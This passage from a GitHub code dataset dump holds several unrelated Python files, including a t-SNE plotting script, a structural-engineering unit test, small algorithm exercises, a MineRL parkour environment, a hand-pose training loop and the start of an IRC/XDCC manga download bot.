np.array([*calculate_consistency(fc_fc)[0],*calculate_consistency(fc_gene)[0],*calculate_consistency(fc_shallow)[0],*calculate_consistency(shallow_fc)[0],*calculate_consistency(shallow_gene)[0],*calculate_consistency(shallow_shallow)[0],*calculate_consistency(tf_gene)[0],*calculate_consistency(tf_fc)[0],*calculate_consistency(tf_shallow)[0]])\n\ndistance_matrix = None\nkendall_matrix = None\n\ndef get_dists(data,sample):\n dists = []\n for row in data:\n dists.append(np.sqrt(np.sum(np.square(row-sample))))\n return dists\n\ndef get_kends(data,sample):\n kends = []\n for row in data:\n kends.append(1-(2/(1+kendalltau(row,sample)[0]+0.0001)))\n return kends \n\nfor sample in data:\n dist = get_dists(data, sample)\n kend = get_kends(data, sample)\n if distance_matrix is None:\n distance_matrix = dist\n kendall_matrix = kend\n else:\n distance_matrix = np.vstack((distance_matrix,dist))\n kendall_matrix = np.vstack((kendall_matrix,kend))\n\nprint(distance_matrix)\nprint(kendall_matrix)\n\n\n#print(data)\n#print(data.shape)\n\n\nkend_embedding = pd.DataFrame(TSNE(n_components=2,learning_rate='auto',init='random',perplexity=5).fit_transform(kendall_matrix),columns=['tsne1','tsne2'])\ndist_embedding = 
pd.DataFrame(TSNE(n_components=2,learning_rate='auto',init='random',perplexity=5).fit_transform(distance_matrix),columns=['tsne1','tsne2'])\nkend_embedding['id']=sample_ids\ndist_embedding['id']=sample_ids\n\n#print(embedding)\n#print(kend_embedding)\n\nsns.scatterplot(\n        x='tsne1',y='tsne2',\n        hue='id',\n        data=dist_embedding,\n        legend='full',\n        )\nplt.title('Consistency T-SNE')\nplt.savefig('dist_tsneeze.png')\n\n\nplt.clf()\nsns.scatterplot(x='tsne1',y='tsne2',hue='id', data=kend_embedding, legend='full',)\n\nplt.savefig('kend_tsneeze.png')\n","repo_name":"schaferd/Modular_DSCA_TF_Prediction","sub_path":"figs/model_figs/t_sneeze.py","file_name":"t_sneeze.py","file_ext":"py","file_size_in_byte":3689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"25825079275","text":"# -*- coding: utf-8 -*-\n''' Limit moment.'''\n\n__author__= \"Luis C. Pérez Tato (LCPT) and Ana Ortega (AO_O)\"\n__copyright__= \"Copyright 2023, LCPT and AO_O\"\n__license__= \"GPL\"\n__version__= \"3.0\"\n__email__= \"l.pereztato@ciccp.es ana.ortega@ciccp.es\"\n\nimport math\nfrom materials.ec2 import EC2_materials\nfrom materials.ec2 import EC2_limit_state_checking\nfrom rough_calculations import ng_rc_section\n\n# Bending with axial force.\n\n# Example 15.8 from the book.\n## Materials.\nconcrete= EC2_materials.C25\nsteel= EC2_materials.S500B\nA10_15= EC2_limit_state_checking.EC2RebarFamily(steel= steel, diam= 10e-3, spacing= 0.15, concreteCover= 0.025)\n\n## Section geometry.\nb= 0.3\ndp= 0.03\nh= 0.5\nrcSection= ng_rc_section.RCSection(tensionRebars= A10_15, concrete= concrete, b= b, h= h)\n\n## Internal forces\nMd= 300e3\nNd= -250e3\n\nAp= rcSection.getCompressionReinforcementArea(dp= dp, Nd= Nd, Md= Md)\nA= rcSection.getTensionReinforcementArea(Ap= Ap, dp= dp, Nd= Nd, Md= Md)\nUp= Ap*steel.fyd()\nU= A*steel.fyd()\n\nerror= math.sqrt((Ap)**2+(A-15.997484618067281e-4)**2)\n\n'''\nprint('fcd= ', -concrete.fcd()/1e6, 'MPa')\nprint('d= ', rcSection.d())\nprint('dp= ', dp)\nprint('Ap= ',Ap*1e4, 'cm2')\nprint('Up= ',Up/1e3, 'kN')\nprint('A= ',A*1e4, 'cm2')\nprint('U= ',U/1e3, 'kN')\nprint('error= ', error)\n'''\n\nimport os\nfrom misc_utils import log_messages as lmsg\nfname= os.path.basename(__file__)\nif (error<1e-6):\n    print('test '+fname+': ok.')\nelse:\n    lmsg.error(fname+' ERROR.')\n","repo_name":"xcfem/xc","sub_path":"verif/tests/rough_calculations/reinforced_concrete/ng_rc_section_bending_with_compression_test_01.py","file_name":"ng_rc_section_bending_with_compression_test_01.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":196,"dataset":"github-code","pt":"31"}
+{"seq_id":"512402633","text":"# OOPS Program to Replace the Paragraph Content with Proper Name,Fullname and Mobile No.\n\nimport re\nimport datetime\n\n# Assigning a Paragraph to the String\n\nstring = \"Hello <>, We have your full name as <> in our system. \" \\\n         \"your contact number is 91-xxxxxxxxxx. 
\" \\\n \"Please,let us know in case of any clarification Thank you BridgeLabz 01/01/2016\"\n\n# Accept Name,Fullname and Mobile no from user\ncount = 1\nwhile count > 0:\n try:\n Name = input(\"Enter the Name:\")\n FullName = input(\"Enter the FullName:\")\n MobileNo = input(\"Enter the Mobile Number:\")\n if not Name.isalpha() or not FullName.isalpha() or not MobileNo.isnumeric():\n raise ValueError\n except:\n print(\"You have entered wrong data.\")\n print(\"Please Enter the Values Again\")\n else:\n break\n # Accepting date using inbuild Function\n\ndate = datetime.datetime.now()\ndateformat = date.strftime(\"%d/%m/%y\")\nstring = re.sub(\"<>\", Name, string) # Replacing the string <> with proper Name\nstring = re.sub(\"<>\", FullName, string) # Replacing the string <> with FullName\nstring = re.sub(\"xxxxxxxxxx\", MobileNo, string) # Replacing the string <> with Mobile No\nstring = re.sub(\"01/01/2016\", dateformat, string) # Replacing the string 01/01/2016 with Today's Date\n# Display the Replace String\n\nprint(string)\n\n\n","repo_name":"Ibbukanch/Python-programs","sub_path":"pythonprograms/OOPS/Reexpdemo.py","file_name":"Reexpdemo.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19340169849","text":"\"\"\"\nGiven a non-negative integer x, return the square root of x rounded down to the nearest integer. The returned integer should be non-negative as well.\n\nYou must not use any built-in exponent function or operator.\n\"\"\"\n\n\"\"\"Intuition\"\"\"\n# def solutions(x:int) -> int:\n# for i in range(x//2):\n# if i*i <= x and (i+1)*(i+1) > x:\n# return i\n# return -1\n\"\"\"\nBinary search\n\"\"\"\ndef solutions(x:int) -> int:\n if x == 0 or x == 1:\n return x\n low = 0\n high = x\n while (low <= high):\n mid = (low + high) // 2\n if (x // mid == mid):\n return mid\n if(x // mid < mid):\n high = mid - 1\n else:\n low = mid + 1\n return high\nprint(solutions(8))","repo_name":"link5401/myl-leet-code","sub_path":"python/my-sqrt/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5577306795","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def sufficientSubset(self, root: Optional[TreeNode], limit: int) -> Optional[TreeNode]:\n return root if self.rec_dfs(root, limit) else None\n \n \n \n def rec_dfs(self, node, limit, curr_sum=0):\n curr_sum += node.val\n \n if not node.left and not node.right:\n return curr_sum >= limit \n \n left = self.rec_dfs(node.left, limit, curr_sum) if node.left else False\n\n right = self.rec_dfs(node.right, limit, curr_sum) if node.right else False\n \n if not left:\n node.left = None\n if not right:\n node.right = None\n \n return left or right\n ","repo_name":"elvinmirzazada/leetcode-challanges","sub_path":"1080-insufficient-nodes-in-root-to-leaf-paths/1080-insufficient-nodes-in-root-to-leaf-paths.py","file_name":"1080-insufficient-nodes-in-root-to-leaf-paths.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"5668729050","text":"\"\"\"\nCreated on Feb 09, 2023\n\n@author: LouisCaubet\n\"\"\"\nfrom typing import List\nimport csv\nimport os\n\nfrom 
minerl.herobraine.env_specs.basalt_specs import BasaltBaseEnvSpec, MINUTE\nfrom minerl.herobraine.env_specs.simple_embodiment import SimpleEmbodimentEnvSpec\nfrom minerl.herobraine.hero.handler import Handler\nimport minerl.herobraine.hero.handlers as handlers\nfrom minerl.herobraine.hero.handlers import TranslationHandler\nfrom minerl.herobraine.hero.mc import MS_PER_STEP\n\nfrom block_list_handler import BlockListHandler\n\nNAVIGATE_STEPS = 6000\n\n\nclass MinecraftParkourEnv(BasaltBaseEnvSpec):\n\n def __init__(self):\n super().__init__(\n name=\"MinecraftParkour-v0\",\n demo_server_experiment_name=\"minecraft_parkour\",\n max_episode_steps=12 * MINUTE,\n preferred_spawn_biome=\"ocean\",\n inventory=[],\n )\n self.blocks = []\n self.start_block = None\n\n def load_map(self, map_csv: str):\n # Do this only once\n if hasattr(self, 'blocks') and len(self.blocks) > 0:\n return\n\n # read csv and create list of blocks\n print(\"Called load map\")\n self.blocks = []\n with open(map_csv, newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n # skip first line\n next(reader)\n for row in reader:\n x = int(row[0])\n y = int(row[1])\n z = int(row[2])\n block_type = row[3]\n self.blocks.append([x, y, z, block_type])\n\n self.start_block = self.blocks[0]\n\n def create_rewardables(self) -> List[handlers.TranslationHandler]:\n rewards = [\n {'type': 'bedrock', 'behaviour': 'onceOnly', 'reward': '-100'},\n {'type': 'diamond_block', 'behaviour': 'onceOnly', 'reward': '100'},\n {'type': 'gold_block', 'behaviour': 'oncePerBlock', 'reward': '10'},\n ]\n\n return [\n handlers.RewardForTouchingBlockType(rewards)\n ]\n\n def create_agent_start(self) -> List[Handler]:\n return [\n handlers.AgentStartPlacement(0.5, 2, 0.5, yaw=-90)\n ]\n\n def create_agent_handlers(self) -> List[Handler]:\n return [\n handlers.AgentQuitFromTouchingBlockType(\n [\"bedrock\", \"diamond_block\"]\n )\n ]\n\n def create_server_initial_conditions(self) -> List[Handler]:\n return [\n handlers.TimeInitialCondition(\n allow_passage_of_time=False,\n start_time=6000\n ),\n handlers.WeatherInitialCondition('clear'),\n handlers.SpawningInitialCondition(False),\n ]\n\n def create_server_decorators(self) -> List[Handler]:\n # Create XML string to draw blocks\n map_csv_path = os.environ['MINERL_PARKOUR_MAP']\n self.load_map(map_csv_path)\n\n return [\n BlockListHandler(self.blocks)\n ]\n\n def create_server_world_generators(self) -> List[Handler]:\n path_to_world = os.path.abspath(os.path.join(\"assets\", \"empty_mc_world\"))\n return [\n handlers.FlatWorldGenerator(generatorString=\"3;7;0;\", force_reset=False),\n ]\n\n # def create_server_quit_producers(self) -> List[Handler]:\n # return [\n # handlers.ServerQuitFromTimeUp(NAVIGATE_STEPS * MS_PER_STEP),\n # handlers.ServerQuitWhenAnyAgentFinishes()\n # ]\n","repo_name":"LouisCaubet/RLMinecraftParkour","sub_path":"src/parkour_env.py","file_name":"parkour_env.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"35844877532","text":"prompt = \"\\nPlease enter a topping you want on your pizza:\"\nprompt += \"\\n(Enter 'quit' when you are finished.) 
\"\n\nactive = True\n\nwhile active:\n pizza_topping = input(prompt)\n\n if pizza_topping == 'quit':\n active = False\n else:\n print(f\"We'll add {pizza_topping} to your pizza.\")","repo_name":"maxrebo2/Python-Work","sub_path":"three_exits1.py","file_name":"three_exits1.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13655957836","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nwhile True:\r\n data = list(map(int, input().rstrip().split()))\r\n if data == [0, 0, 0]:\r\n break\r\n else:\r\n data.sort()\r\n if data[2] >= data[0] + data[1]:\r\n print('Invalid')\r\n else:\r\n if data[0] == data[2]:\r\n print('Equilateral')\r\n elif (data[0] == data[1]) or (data[1] == data[2]):\r\n print('Isosceles')\r\n else:\r\n print('Scalene')","repo_name":"jwshin0908/Algorithm","sub_path":"백준/Bronze/5073. 삼각형과 세 변/삼각형과 세 변.py","file_name":"삼각형과 세 변.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72700704087","text":"'''\ntraining\n'''\nimport argparse\nimport os\n\nimport random\nimport progressbar\nimport time\nimport logging\nimport pdb\nfrom tqdm import tqdm\nimport numpy as np\nimport scipy.io as sio\nimport importlib\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.optim.lr_scheduler as lr_scheduler\nimport torch.utils.data\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\nfrom dataset_msra import HandPointDataset\n\nfrom utils import rotate_point_cloud_by_angle_flip, rotate_point_cloud_by_angle_nyu, rotate_point_cloud_by_angle_xyz\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--batchSize', type=int, default=32, help='input batch size')\nparser.add_argument('--workers', type=int, default=0, help='number of data loading workers')\nparser.add_argument('--nepoch', type=int, default=160, help='number of epochs to train for')\nparser.add_argument('--ngpu', type=int, default=1, help='# GPUs')\nparser.add_argument('--main_gpu', type=int, default=0, help='main GPU id') # CUDA_VISIBLE_DEVICES=0 python train.py\n\nparser.add_argument('--learning_rate', type=float, default=0.001, help='learning rate at t=0')\nparser.add_argument('--momentum', type=float, default=0.9, help='momentum (SGD only)')\nparser.add_argument('--weight_decay', type=float, default=0.05, help='weight decay (SGD only)')\nparser.add_argument('--learning_rate_decay', type=float, default=1e-7, help='learning rate decay')\n\nparser.add_argument('--size', type=str, default='full', help='how many samples do we load: small | full')\nparser.add_argument('--SAMPLE_NUM', type=int, default = 1024, help='number of sample points')\nparser.add_argument('--bit_width', type=int, default=4, help='quantize for bit width')\nparser.add_argument('--JOINT_NUM', type=int, default = 21, help='number of joints')\nparser.add_argument('--INPUT_FEATURE_NUM', type=int, default = 3, help='number of input point features')\nparser.add_argument('--iters', type=int, default = 3, help='start epoch')\n\nparser.add_argument('--start_epoch', type=int, default = 0, help='start epoch')\nparser.add_argument('--test_index', type=int, default = 0, help='test index for cross validation, range: 0~8')\nparser.add_argument('--save_root_dir', type=str, default='results', help='output folder')\nparser.add_argument('--model', type=str, 
default = '', help='model name for training resume')\nparser.add_argument('--optimizer', type=str, default = '', help='optimizer name for training resume')\n\nparser.add_argument('--dataset', type=str, default = 'nyu', help='dataset name: nyu | icvl | msra')\nparser.add_argument('--dataset_path', type=str, default = '/workspace/HandFoldDynGraph/data/NYU/process_nyu_center_rot0_2048_com/Training', help='path to the training data')\nparser.add_argument('--test_path', type=str, default = '/workspace/HandFoldDynGraph/data/NYU/process_nyu_center_com/Testing', help='path to the testing data')\n\n\nparser.add_argument('--model_name', type=str, default = 'rrnn', help='network module name (network_ prefix)')\nparser.add_argument('--gpu', type=str, default = '0', help='gpu')\n\nopt = parser.parse_args()\n\nmodule = importlib.import_module('network_'+opt.model_name)\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=opt.gpu\n\ntorch.cuda.set_device(opt.main_gpu)\n\nopt.manualSeed = 1\nrandom.seed(opt.manualSeed)\ntorch.manual_seed(opt.manualSeed)\n\nif opt.dataset == 'msra':\n\tfrom dataset_msra import subject_names\n\tsave_dir = os.path.join(opt.save_root_dir, opt.dataset+ '_' + opt.model_name+'_'+str(opt.iters)+'iters', subject_names[opt.test_index])\n\topt.JOINT_NUM = 21\nelse:\n\tsave_dir = os.path.join(opt.save_root_dir, opt.dataset+ '_' + opt.model_name+'_'+str(opt.iters)+'iters')\n\tif opt.dataset == 'icvl':\n\t\tfrom dataset_icvl import HandPointDataset\n\t\tfrom dataset_icvl_arm_com import HandPointDatasetArm\n\t\topt.JOINT_NUM = 16\n\telse:\n\t\tfrom dataset_nyu import HandPointDataset\n\t\tfrom dataset_nyu_arm_com import HandPointDatasetArm\n\t\topt.JOINT_NUM = 14\n\n\ndef _debug(model):\n\tmodel = model.netR_1\n\tprint(model.named_parameters())\ntry:\n\tos.makedirs(save_dir)\nexcept OSError:\n\tpass\n\nlogging.basicConfig(format='%(asctime)s %(message)s', datefmt='%Y/%m/%d %H:%M:%S', \\\n\t\t\t\t\tfilename=os.path.join(save_dir, 'train.log'), level=logging.INFO)\nlogging.info('======================================================')\n\n# 1. Load data\nif opt.dataset == 'icvl' or opt.dataset == 'nyu':\t\n\ttrain_data = HandPointDatasetArm(root_path=opt.dataset_path, opt=opt, train = True, sample=2048, output_num=1024)\n\nelse:\t\t\t\t\t\t\t\t\t \n\ttrain_data = HandPointDataset(root_path=opt.dataset_path, opt=opt, train = True)\ntrain_dataloader = torch.utils.data.DataLoader(train_data, batch_size=opt.batchSize,\n\t\t\t\t\t\t\t\t\t\tshuffle=True, num_workers=int(opt.workers), pin_memory=False)\n\ntest_data = HandPointDataset(root_path=opt.test_path, opt=opt, train = False)\ntest_dataloader = torch.utils.data.DataLoader(test_data, batch_size=opt.batchSize,\n\t\t\t\t\t\t\t\t\t\t shuffle=False, num_workers=int(opt.workers), pin_memory=False)\n\nprint('#Train data:', len(train_data), '#Test data:', len(test_data))\nprint (opt)\n\n# 2. Define model, loss and optimizer\nmodel = getattr(module, 'HandModel')(joints=opt.JOINT_NUM, iters=opt.iters)\n\nif opt.ngpu > 1:\n\tmodel.netR_1 = torch.nn.DataParallel(model.netR_1, range(opt.ngpu))\n\tmodel.netR_2 = torch.nn.DataParallel(model.netR_2, range(opt.ngpu))\n\tmodel.netR_3 = torch.nn.DataParallel(model.netR_3, range(opt.ngpu))\nif opt.model != '':\n\tmodel.load_state_dict(torch.load(os.path.join(save_dir, opt.model)))\n\t\nmodel.cuda()\nprint(model)\n\nparameters = model.parameters()\n\n# Huber-style smooth L1 loss: quadratic for |input - target| < 1/sigma^2, linear beyond.\ndef smooth_l1_loss(input, target, sigma=10., reduce=True, normalizer=1.0):\n    beta = 1. 
/ (sigma ** 2)\n    diff = torch.abs(input - target)\n    cond = diff < beta\n    loss = torch.where(cond, 0.5 * diff ** 2 / beta, diff - 0.5 * beta)\n    if reduce:\n        return torch.sum(loss) / normalizer\n    return torch.sum(loss, dim=1) / normalizer\ncriterion = smooth_l1_loss\n\noptimizer = optim.AdamW(parameters, lr=opt.learning_rate, betas = (0.5, 0.999), eps=1e-06, weight_decay=opt.weight_decay)\nif opt.optimizer != '':\n\toptimizer.load_state_dict(torch.load(os.path.join(save_dir, opt.optimizer)))\nscheduler = lr_scheduler.StepLR(optimizer, step_size=120, gamma=0.1)\nif opt.dataset == 'icvl':\n\tscheduler = lr_scheduler.StepLR(optimizer, step_size=160, gamma=0.1)\nif opt.dataset == 'nyu':\n\tscheduler = lr_scheduler.MultiStepLR(optimizer, milestones=[120, 160], gamma=0.1)\n\ntest_best_error = np.inf\n\n# 3. Training and testing\nfor epoch in range(opt.start_epoch, opt.nepoch):\n\tscheduler.step(epoch)\n\tif opt.dataset == 'msra':\n\t\tprint('======>>>>> Online epoch: #%d, lr=%f, Test: %s <<<<<======' %(epoch, scheduler.get_lr()[0], subject_names[opt.test_index]))\n\telse:\n\t\tprint('======>>>>> Online epoch: #%d, lr=%f <<<<<======' %(epoch, scheduler.get_lr()[0]))\n\n\t# 3.1 switch to train mode\n\ttorch.cuda.synchronize()\n\tmodel.train()\n\ttrain_mse = 0.0\n\ttrain_mse_wld = 0.0\n\ttimer = time.time()\n\n\tfor i, data in enumerate(tqdm(train_dataloader, 0)):\n\t\tif len(data[0]) == 1:\n\t\t\tcontinue\n\t\ttorch.cuda.synchronize() \n\t\t# 3.1.1 load inputs and targets\n\t\tpoints, volume_length, gt_xyz , _= data\n\t\t# gt_pca = Variable(gt_pca, requires_grad=False).cuda()\n\t\tpoints, volume_length, gt_xyz = points.cuda(), volume_length.cuda(), gt_xyz.cuda()\n\n\t\tpermutation = torch.randperm(points.size(1))\n\t\tpoints = points[:,permutation,:]\n\n\t\tpoints, gt_xyz = rotate_point_cloud_by_angle_xyz(points, gt_xyz.view(-1, opt.JOINT_NUM , 3), False)\n\n\t\tshift = ((torch.rand((points.size(0),3)).cuda() * 40. - 20.) 
/ volume_length).view(-1, 1, 3)\n\t\tpoints[:,:,0:3] = points[:,:,0:3] + shift\n\t\tgt_xyz = gt_xyz + shift\n\n\t\tscale = (torch.rand(points.size(0)).cuda() * 0.4 + 0.8).view(-1, 1, 1)\n\t\tpoints = points * scale\n\t\tgt_xyz = gt_xyz * scale\t\t\n\t\t\n\t\tgt_xyz = gt_xyz.view(-1, opt.JOINT_NUM * 3)\n\n\t\t# print(gt_xyz.size())\n\t\t# points: B * 1024 * 6; target: B * 42\n\t\t# 3.1.2 compute output\n\t\toptimizer.zero_grad()\n\n\t\tfolds= model(points.transpose(1,2), points.transpose(1,2))\n\t\testimation = folds[-1]\n\t\tloss = criterion(estimation, gt_xyz)*1\n\t\tfor i in range(len(folds) - 1):\n\n\t\t\tloss += criterion(folds[i], gt_xyz) * (0.8**(len(folds)-i))\n\t\tloss = loss*opt.JOINT_NUM * 3\n\n\t\t# 3.1.3 compute gradient and do SGD step\n\t\tloss.backward()\n\t\toptimizer.step()\n\t\ttorch.cuda.synchronize()\n\t\t\n\t\t# 3.1.4 update training error\n\t\ttrain_mse = train_mse + loss.item()*len(points)\n\t\t\n\t\t# 3.1.5 compute error in world cs \n\t\toutputs_xyz = estimation\n\t\tdiff = torch.pow(outputs_xyz-gt_xyz, 2).view(-1,opt.JOINT_NUM,3)\n\t\tdiff_sum = torch.sum(diff,2)\n\t\tdiff_sum_sqrt = torch.sqrt(diff_sum)\n\t\tdiff_mean = torch.mean(diff_sum_sqrt,1).view(-1,1)\n\t\tdiff_mean_wld = torch.mul(diff_mean,volume_length)\n\t\ttrain_mse_wld = train_mse_wld + diff_mean_wld.sum().item()\n\n\t# time taken\n\ttorch.cuda.synchronize()\n\ttimer = time.time() - timer\n\ttimer = timer / len(train_data)\n\tprint('==> time to learn 1 sample = %f (ms)' %(timer*1000))\n\n\t# print mse\n\ttrain_mse = train_mse / len(train_data)\n\ttrain_mse_wld = train_mse_wld / len(train_data)\n\n\n\tprint('mean-square error of 1 sample: %f, #train_data = %d' %(train_mse, len(train_data)))\n\tprint('average estimation error in world coordinate system: %f (mm)' %(train_mse_wld))\n\n\tif (epoch % 10) == 0:\n\t\ttorch.save(model.state_dict(), '%s/netR_%d.pth' % (save_dir, epoch))\n\t\ttorch.save(optimizer.state_dict(), '%s/optimizer_%d.pth' % (save_dir, epoch))\n\n\t# 3.2 switch to evaluate mode\n\ttorch.cuda.synchronize()\n\tmodel.eval()\n\ttest_mse = 0.0\n\ttest_wld_err = 0.0\n\ttimer = time.time()\n\tfor i, data in enumerate(tqdm(test_dataloader, 0)):\n\t\ttorch.cuda.synchronize()\n\t\twith torch.no_grad():\n\t\t\t# 3.2.1 load inputs and targets\n\t\t\tpoints, volume_length, gt_xyz, _ = data\n\t\t\tpoints, volume_length, gt_xyz = points.cuda(), volume_length.cuda(), gt_xyz.cuda()\n\n\t\t\tfolds= model(points.transpose(1,2), points.transpose(1,2))\n\t\t\testimation = folds[-1]\n\t\t\tloss = criterion(estimation, gt_xyz)*1\n\t\t\tfor i in range(len(folds) - 1):\n\t\t\t\tloss += criterion(folds[i], gt_xyz) * (0.8**(len(folds)-i))\n\t\t\t\t# loss += criterion(folds[i], gt_xyz) * 1\n\t\t\tloss = loss*opt.JOINT_NUM * 3\n\n\t\ttorch.cuda.synchronize()\n\t\ttest_mse = test_mse + loss.item()*len(points)\n\n\t\t# 3.2.3 compute error in world cs \n\t\toutputs_xyz = estimation\n\t\tdiff = torch.pow(outputs_xyz-gt_xyz, 2).view(-1,opt.JOINT_NUM,3)\n\t\tdiff_sum = torch.sum(diff,2)\n\t\tdiff_sum_sqrt = torch.sqrt(diff_sum)\n\t\tdiff_mean = torch.mean(diff_sum_sqrt,1).view(-1,1)\n\t\tdiff_mean_wld = torch.mul(diff_mean,volume_length)\n\t\ttest_wld_err = test_wld_err + diff_mean_wld.sum().item()\n\n\tif test_best_error > test_wld_err:\n\t\ttest_best_error = test_wld_err\n\t\ttorch.save(model.state_dict(), '%s/best_model.pth' % (save_dir))\n\t\ttorch.save(optimizer.state_dict(), '%s/best_optimizer.pth' % (save_dir))\n\t\t\t\t\n\t# time taken\n\ttorch.cuda.synchronize()\n\ttimer = time.time() - timer\n\ttimer = timer / 
len(test_data)\n\tprint('==> time to learn 1 sample = %f (ms)' %(timer*1000))\n\t# print mse\n\ttest_mse = test_mse / len(test_data)\n\tprint('mean-square error of 1 sample: %f, #test_data = %d' %(test_mse, len(test_data)))\n\ttest_wld_err = test_wld_err / len(test_data)\n\tprint('average estimation error in world coordinate system: %f (mm)' %(test_wld_err))\n\t# log\n\tlogging.info('Epoch#%d: train error=%e, train wld error = %f mm, test error=%e, test wld error = %f mm, best wld error = %f, lr = %f' %(epoch, train_mse, train_mse_wld, test_mse, test_wld_err, test_best_error / len(test_data), scheduler.get_lr()[0]))","repo_name":"cwc1260/HandR2N2","sub_path":"train_rrnn.py","file_name":"train_rrnn.py","file_ext":"py","file_size_in_byte":11466,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12651998641","text":"\n\nimport MangaCMSOld.ScrapePlugins.MangaScraperDbBase\nimport MangaCMSOld.ScrapePlugins.RetreivalBase\nimport MangaCMSOld.ScrapePlugins.M.IrcGrabber.IrcBot\nimport irc.client\n\nimport threading\nimport nameTools as nt\nimport settings\nimport os\nimport os.path\nimport time\nimport json\nimport runStatus\nimport traceback\n\nimport MangaCMSOld.cleaner.processDownload\n\nimport abc\n\nclass DbWrapper(MangaCMSOld.ScrapePlugins.RetreivalBase.RetreivalBase):\n\n\tpluginName = \"IrcDb Wrapper\"\n\tpluginType = \"IrcContentRetreiver\"\n\n\tloggerPath = \"Main.Manga.IRC.db\"\n\n\tdbName = settings.DATABASE_DB_NAME\n\ttableName = \"MangaItems\"\n\n\t@abc.abstractmethod\n\tdef tableKey(self):\n\t\tpass\n\n\t# override __init__, catch tabkeKey value, call parent __init__ with the rest of the args\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(DbWrapper, self).__init__(*args, **kwargs)\n\n\t# Have to define go (it's abstract in the parent). We're never going to call it, though.\n\tdef go(self):\n\t\tpass\n\tdef getLink(self):\n\t\tpass\n\n\n\tdef retreiveTodoLinkFromDB(self):\n\n\t\tself._resetStuckItems()\n\t\tself.log.info( \"Fetching items from db...\",)\n\n\t\trows = self.getRowsByValue(dlState=0)\n\n\t\trows = sorted(rows, key=lambda k: k[\"retreivalTime\"], reverse=True)\n\n\t\tself.log.info( \"Done\")\n\t\tif not rows:\n\t\t\tself.log.info(\"No new items, nothing to do.\")\n\t\t\treturn None\n\n\n\t\tself.log.info( \"Have %s new items to retreive in IrcDownloader\" % len(rows))\n\n\t\t# Each call returns one item.\n\t\titem = rows.pop(0)\n\n\t\titem[\"retreivalTime\"] = time.gmtime(item[\"retreivalTime\"])\n\n\t\treturn item\n\n\n\tdef getDownloadPath(self, item, fName):\n\n\t\tif not item['seriesName']:\n\t\t\tself.log.info(\"No series set for item. Guessing from filename:\")\n\t\t\tself.log.info(\"Filename = '%s'\", fName)\n\t\t\tbareName = nt.guessSeriesFromFilename(fName)\n\n\t\t\t# if not matchName or not matchName in nt.dirNameProxy:\n\t\t\tif not nt.haveCanonicalMangaUpdatesName(bareName):\n\t\t\t\titem[\"seriesName\"] = settings.ircBot[\"unknown-series\"]\n\t\t\telse:\n\t\t\t\titem[\"seriesName\"] = nt.getCanonicalMangaUpdatesName(bareName)\n\n\t\t\tself.log.info(\"Guessed = '%s'. 
Updating series information\", item['seriesName'])\n\t\t\tself.updateDbEntry(item[\"sourceUrl\"], seriesName=item[\"seriesName\"])\n\n\n\t\tdlPath, newDir = self.locateOrCreateDirectoryForSeries(item[\"seriesName\"])\n\n\t\tif item[\"flags\"] == None:\n\t\t\titem[\"flags\"] = \"\"\n\n\t\tif newDir:\n\t\t\tself.updateDbEntry(item[\"sourceUrl\"], flags=\" \".join([item[\"flags\"], \"haddir\"]))\n\n\t\tfqFName = os.path.join(dlPath, fName)\n\n\t\tloop = 1\n\n\t\tfName, ext = os.path.splitext(fName)\n\n\t\twhile os.path.exists(fqFName):\n\t\t\tfName = \"%s - (%d).%s\" % (fName, loop, ext)\n\t\t\tfqFName = os.path.join(dlPath, fName)\n\t\t\tloop += 1\n\t\tself.log.info(\"Saving to archive = %s\", fqFName)\n\n\n\t\tself.updateDbEntry(item[\"sourceUrl\"], downloadPath=dlPath, fileName=fName, originName=fName)\n\n\t\treturn fqFName\n\n\nclass DbXdccWrapper(DbWrapper):\n\ttableKey = \"irc-irh\"\n\n\tdef __init__(self, log_suffix):\n\t\tself.loggerPath = self.loggerPath + \"<{}>\".format(log_suffix)\n\t\tsuper().__init__()\n\nclass DbTriggerWrapper(DbWrapper):\n\ttableKey = \"irc-trg\"\n\n\tdef __init__(self, log_suffix):\n\t\tself.loggerPath = self.loggerPath + \"<{}>\".format(log_suffix)\n\t\tsuper().__init__()\n\n\n\nclass FetcherBot(MangaCMSOld.ScrapePlugins.M.IrcGrabber.IrcBot.TestBot):\n\n\tdef __init__(self, nickname, realname, server, port=9999):\n\t\tself.xdcc = DbXdccWrapper(server)\n\t\tself.trgr = DbTriggerWrapper(server)\n\n\t\tself.db = None\n\t\tself.run = True\n\n\t\tself.states = [\"idle\", \"xdcc requested\", \"xdcc receiving\", \"xdcc finished\", \"xdcc failed\"]\n\t\tself.state = \"idle\"\n\n\t\tself.currentItem = None\n\t\tself.todo = []\n\n\t\tself.base_channels = ['#madokami']\n\n\t\tself.timer = None\n\n\t\t# Time to wait between requesting someing over XDCC, and marking the request as failed due to timeout\n\t\tself.xdcc_wait_time = 120\n\n\t\tsuper(FetcherBot, 